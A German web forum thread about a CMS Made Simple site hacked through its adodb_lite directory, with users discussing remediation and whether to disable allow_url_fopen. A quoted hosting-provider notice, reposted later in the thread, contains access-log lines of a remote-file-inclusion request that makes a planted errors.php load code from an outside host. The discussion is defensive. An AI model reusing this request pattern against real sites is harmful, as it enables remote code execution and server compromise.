CMSMS gehackt - was nun?

[Elodira]

Hallo,
ich habe eine Website, die kürzlich gehackt wurde. Ausschlag hierfür war wohl die ADODB_lite DB.
Nun habe ich mir die ADODB Full-Version runtergeladen.
Darin sind ja dann folgende Dateien enthalten:

Code: Select all

adodb-mssqlnative.inc.php
datadict-mssqlnative.inc.php
perf-mssqlnative.inc.php

In der Beschreibung steht nun folgendes:

Code: Select all

The ADODB Lite database abstraction layer used in CMCMS is full of vulnerabilities, and is no longer maintained, so there is not much hope for a patch.

Install and use den full version of ADODB instead. It can be downloaded from http://phplens.com/adodb/index.html

Unpack the zip file, and upload to the /lib directory on your CMSMS site.

Then change the value of $config['use_adodb_lite'] from true to false in your config.php

[Important] Delete the adodb_lite directory from the /lib directory to block future hacks.

Ich habe nun das Problem, dass ich nicht weiß wie die Verzeichnisstruktur dann exakt aussehen soll?! Denn runterladen tut man ja folgendes: C:\......\adodb-mssqlnative\adodb499\[dateien] und C:\......\adodb-mssqlnative\adodb505\[dateien]

In dem darin liegenden Text-File steht dann außerdem:

Code: Select all

Place the following files in adodb 4.99 or 5.05 directories:

	adodb/data-dict/datadict-mssqlnative.inc.php
	adodb/drivers/adodb-mssqlnative.inc.php
	adodb/perf/perf-mssqlnative.inc.php 
	
Download adodb from:

  http://sourceforge.net/project/showfiles.php?group_id=42718

Download mssqlnative extension from

  http://www.microsoft.com/downloads/details.aspx?FamilyId=61BF87E0-D031-466B-B09A-6597C21A2E2A&displaylang=en

Trotzdem werde ich da nicht wirklich schlau draus. 
Kann mir das bitte nochmal jemand für "Dumme" erklären? 
z.B. wie die Verzeichnisstruktur auf dem FTP aussehen muss oder was ich noch einstellen muss, ausser in der config.php den erwähnten Wert von true auf false zu setzen.
Lösche ich nämlich das adodb_lite Verzeichnis, funktioniert auch meine CMSMS-Website nicht mehr.

Vielen lieben Dank schon einmal im Voraus für eure Hilfe.


LG Elo

[cyberman]

Ähmm, mssql ... offiziell unterstützt CMSms dies nicht, nur mysql.

Und in welcher Beschreibung soll etwas stehen, dass AdoDB lite buggy ist ?

Grundsätzlich musst du das Verzeichnis adodb_bla in adodb umbenennen und in das gleiche Verzeichnis wie das adodb_lite kopieren (zusätzlich zu der config.php-Einstellung).

[MisterT]

Ich habe ein ähnliches Problem. Sehr ärgerlich! Habe die V. 1.25

Bevor ich jetzt ein Update mache, ist der Fehler behoben?

Hier die Nachricht meines Providers:
******************************************************

wir registrierten vor kurzem einen Crackversuch auf unseren Servern,
der
von Ihrer Präsenz ausging. Der Angreifer versuchte, sich durch
Sicherheitslücken in den von Ihnen verwendeten Scripten Zugriff zum
Server zu verschaffen. Es ist davon auszugehen, dass der Angreifer
Zugriff auf Ihre Daten erhalten konnte.

Es handelt sich um das Verzeichnis "adodb_lite", welches über eine
"errors.php" durch den Parameter "error=" die Ausführung beliebigen
Codes erlaubt.

access.log.38.gz:212.227.29.60 - - [17/Sep/2008:17:48:12 +0200] "GET
//lib/adodb_lite/errors.php?error=http://recyclethailand.com/source??
HTTP/1.1" 200 - www.#####.de "-" "libwww-perl/5.805" "-"
access.log.38.gz:212.227.29.60 - - [17/Sep/2008:17:51:12 +0200] "GET
//lib/adodb_lite/errors.php?error=http://recyclethailand.com/source??
HTTP/1.1" 200 - www.#####g.de "-" "libwww-perl/5.805" "-"

Bitte prüfen Sie die Inhalte Ihrer Präsenz und ändern Sie Ihre
Passwörter. Wir haben das PHP-Feature 'allow_url_fopen' für das
entsprechende Verzeichnis über eine php.ini deaktiviert. Trotzdem
empfehlen wir, das Script zu überarbeiten bzw. auf die aktuellste
Version zu aktualisieren.

Wir empfehlen Ihnen sich regelmäßig über Updates aller installierten
Software zu informieren, z.B. über entsprechende Announce-Mailinglisten
oder Foren des Herstellers. Insbesondere gilt dies auch für die
Komponenten von Drittherstellern der verwendeten Applikationen. Diese
sind mittlerweile ein gängiges Angriffsziel. Es werden mit Updates
teilweise auch Lücken geschlossen, die nicht in den Release-Notes der
Software verzeichnet sind. Verwenden Sie lediglich Programme aus
vertrauenswürdigen Quellen.


Wir haben die beteiligten Dateien - soweit ersichtlich - vorerst
mittels
chmod gesperrt. Bitte entfernen Sie sämtliche von Dritten hinterlegten
Dateien und sichern Sie Ihre Software gegen Missbrauch ab.

#####/lib/adodb_lite
mode of `source/' changed to 0200 (-w-------)
mode of `r0nin' changed to 0200 (-w-------)
mode of `errors.php' changed to 0200 (-w-------)
******************************************************
(##### = Anonymisierung von mir)

[NaN]

Interessant.



Bei mir gibt es im ganzen CMSms Verzeichnis keine einzige errors.php !!!
Schon gar nicht im Verziechnis lib/adodb_lite.
Habe die Versionen 1.2.3 , 1.2.5, 1.3 und 1.4 geprüft.

Ich vermute, diese Datei hat dort jemand eingeschleust.
Denn auf eine Variable namen $_GET['error'] wird im ganzen AdoDB Layer nirgends zugegriffen.
Dieser Angriffsversuch kann meiner Meinung nach unmöglich über den regulären AdoDB Code ausgeführt worden sein.
Was steht denn in dieser errors.php?
(bitte nicht posten. schick sowas lieber per mail)
Viel wichtiger zu klären, wäre die Frage, wie diese errors.php auf den Server gelangen konnte.


Edit:

access.log.38.gz:212.227.29.60 - - [17/Sep/2008:17:48:12 +0200] "GET
//lib/adodb_lite/errors.php?error=http://recyclethailand.com/source??
HTTP/1.1" 200 - www.#####.de "-" "libwww-perl/5.805" "-"
access.log.38.gz:212.227.29.60 - - [17/Sep/2008:17:51:12 +0200] "GET
//lib/adodb_lite/errors.php?error=http://recyclethailand.com/source??
HTTP/1.1" 200 - www.#####g.de "-" "libwww-perl/5.805" "-"

Schon die Tipps und Tricks zum Thema Sicherheit gelesen?
Solche Anfragen lassen sich bereits mit einer .htaccess-Datei oder phpIDS blockieren.

[nockenfell]

Ich frage mich allgemein weshalb allow_url_fopen erlaubt werden sollte. Grundsätzlich bin ich der Meinung das nur Datein ausgeführt oder geöffnet werden dürfen die auch auf dem eigenen Server liegen und direkt ansprechbar sind.

Ich hab den Support zumindest bei mir im php.ini ausgeschaltet und habe bisher keine Einschränkung gefunden.

[cyberman]

Ich frage mich allgemein weshalb allow_url_fopen erlaubt werden sollte.

Mit dieser Funktion wird im Backend das Vorhandensein neuer Versionen auf dem cmsmadesimple.org-Server abgefragt.

[nockenfell]

Mit dieser Funktion wird im Backend das Vorhandensein neuer Versionen auf dem cmsmadesimple.org-Server abgefragt.

Soweit ich weiss gibt es keine Möglichkeit allow_url_fopen für bestimmte Adressen zuzulassen. Deshalb ist mir diese Funktionalität zu heikel. (wir hatten mal einen Einbruch auf unserem Server deswegen)
Über neue CMSMS Versionen kann man sich auch per Mail informieren lassen.

[cyberman]

Soweit ich weiss gibt es keine Möglichkeit allow_url_fopen für bestimmte Adressen zuzulassen. Deshalb ist mir diese Funktionalität zu heikel.

Zum Thema allow_url_fopen leuchten mir allerdings auch diese Argumente ein

http://support.living-e.de/de/server/in ... gorieID=78

[nockenfell]

Das Argument der Firewall funktioniert nur wenn man Zugriff auf diese hat bzw. wenn auf dem Server nur diese eine Applikation läuft.

Auf unserem Server sind ca 400 Kundendomains. Wenn ich nun für jede einzelne eine Ausnahme für dieses und jenes CMS etc. einrichten müsste...

Das allow_url_fopen nur durch eine Sicherheitslücke eines Scripts ausgenutzt werden kann und dies nur auf den virtuellen Server beschränkt ist, stimmt nur zum Teil. Ist neben dem allow_url_fopen noch exec oder system offen sowie eine weitere Sicherheitslücke auf dem Server offen (was man nie zu 100% ausschliessen kann) kann dies zu weiteren hacks führen.

Zudem sind die meisten Domains nicht in eigentlichen virtuellen Maschinen pro Kunde untergebracht sondern auf einer Maschine mit mehreren Kunden. Somit ist sofort mehr davon betroffen.